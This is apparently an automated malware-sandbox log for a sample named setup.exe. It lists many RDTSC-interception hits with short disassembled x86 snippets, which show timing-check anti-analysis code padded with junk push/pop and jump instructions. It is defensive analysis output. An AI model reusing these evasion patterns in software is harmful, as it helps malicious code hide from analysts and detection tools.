Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBFAEB second address: EBFB03 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE0B4522B1Eh 0x00000008 jp 00007FE0B4522B1Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBFF5C second address: EBFF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBFF62 second address: EBFF8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FE0B4522B22h 0x0000000f jnc 00007FE0B4522B16h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC0235 second address: EC023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC04E1 second address: EC0503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c jng 00007FE0B4522B16h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC0503 second address: EC0509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC0AA0 second address: EC0AAA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE0B4522B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC6BFA second address: EC6C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE0B4F44DC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC6C04 second address: EC6C53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B29h 0x00000007 jns 00007FE0B4522B16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FE0B4522B1Eh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop eax 0x00000018 pop ebx 0x00000019 push ebx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007FE0B4522B1Dh 0x00000022 jng 00007FE0B4522B16h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC59F2 second address: EC59F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC59F6 second address: EC59FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC59FF second address: EC5A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC5B52 second address: EC5B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007FE0B4522B16h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC5B60 second address: EC5B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC5B64 second address: EC5B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC5B6E second address: EC5B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC5B74 second address: EC5B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC5B78 second address: EC5B86 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC5B86 second address: EC5B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC5E4A second address: EC5E5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE0B4F44DCFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC5FAB second address: EC5FB9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE0B4522B18h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC6412 second address: EC6422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007FE0B4F44DC6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC6422 second address: EC6427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC6427 second address: EC6431 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE0B4F44DD2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC6431 second address: EC6446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE0B4522B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC6446 second address: EC644B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC68F7 second address: EC68FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC9443 second address: EC9453 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE0B4F44DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC95C5 second address: EC95D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FE0B4522B1Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC95D7 second address: EC9633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE0B4F44DD8h 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE0B4F44DD4h 0x00000018 pushad 0x00000019 jmp 00007FE0B4F44DD8h 0x0000001e je 00007FE0B4F44DC6h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC9633 second address: EC9638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC9638 second address: EC9653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE0B4F44DD3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC9653 second address: EC965C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ECC012 second address: ECC016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ECFDF4 second address: ECFDF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ECFDF8 second address: ECFDFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ECFDFC second address: ECFE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ECFE02 second address: ECFE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FE0B4F44DF4h 0x0000000c jmp 00007FE0B4F44DD9h 0x00000011 jmp 00007FE0B4F44DD5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ECFE3C second address: ECFE41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ECFE41 second address: ECFE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ECFE49 second address: ECFE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FE0B4522B41h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ECFE85 second address: ECFE8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ECFE8B second address: ECFE91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ECF507 second address: ECF50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ECF50B second address: ECF51B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FE0B4522B1Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED4206 second address: ED420A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED4361 second address: ED4383 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE0B4522B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE0B4522B26h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED44EE second address: ED44F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED44F2 second address: ED4520 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE0B4522B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007FE0B4522B20h 0x00000010 jnp 00007FE0B4522B32h 0x00000016 ja 00007FE0B4522B22h 0x0000001c jne 00007FE0B4522B16h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED4687 second address: ED468D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED468D second address: ED46B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edi 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007FE0B4522B29h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED47E4 second address: ED4815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DD6h 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push eax 0x00000011 jng 00007FE0B4F44DC8h 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E81E74 second address: E81E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E81E79 second address: E81ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FE0B4F44DC6h 0x00000009 jg 00007FE0B4F44DC6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dx, 9ED0h 0x00000019 mov ebx, dword ptr [ebp+12496053h] 0x0000001f mov edx, 497EB8E2h 0x00000024 mov dword ptr [ebp+12470854h], ecx 0x0000002a add eax, ebx 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007FE0B4F44DC8h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov edx, 1A64E797h 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push edi 0x0000004f pushad 0x00000050 popad 0x00000051 pop edi 0x00000052 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED53D5 second address: ED53E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FE0B4522B16h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED53E2 second address: ED5402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FE0B4F44DD2h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED5402 second address: ED5406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED5406 second address: ED5430 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE0B4F44DC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FE0B4F44DD8h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED9B17 second address: ED9B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED9B1C second address: ED9B27 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007FE0B4F44DC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED9C98 second address: ED9C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED9E00 second address: ED9E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED9E04 second address: ED9E0A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED9E0A second address: ED9E52 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE0B4F44DDCh 0x00000008 pushad 0x00000009 jmp 00007FE0B4F44DD5h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jne 00007FE0B4F44DC6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push ecx 0x0000001a jbe 00007FE0B4F44DCCh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EDFB3B second address: EDFB3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EDFB3F second address: EDFB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FE0B4F44DCCh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EDFB51 second address: EDFB6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FE0B4522B16h 0x00000009 jmp 00007FE0B4522B23h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EDFB6F second address: EDFB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jbe 00007FE0B4F44DCEh 0x0000000e jnc 00007FE0B4F44DC8h 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE0D51 second address: EE0D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE0D55 second address: EE0D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE0D5B second address: EE0D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE6B39 second address: EE6B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE6B3F second address: EE6B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE6B45 second address: EE6B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE6B4C second address: EE6B5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE6B5F second address: EE6B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE6B63 second address: EE6B6D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE0B4522B16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE9AAB second address: EE9AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE9AB3 second address: EE9AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE0B4522B16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE9AC2 second address: EE9AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE9D63 second address: EE9D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE0B4522B16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE9D6F second address: EE9D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE9D7A second address: EE9D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE9EE1 second address: EE9EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE9EE5 second address: EE9EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE9EE9 second address: EE9EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EEA456 second address: EEA45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EEA5AF second address: EEA5D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE0B4F44DD5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF2548 second address: EF2558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FE0B4522B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF2558 second address: EF2582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE0B4F44DC6h 0x0000000a jmp 00007FE0B4F44DD5h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007FE0B4F44DC6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF285C second address: EF2878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE0B4522B21h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF2878 second address: EF287E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF287E second address: EF2884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF2884 second address: EF2888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF29CE second address: EF29D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF2B5E second address: EF2B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE0B4F44DC6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF2CFF second address: EF2D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF1B7A second address: EF1B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FE0B4F44DCAh 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
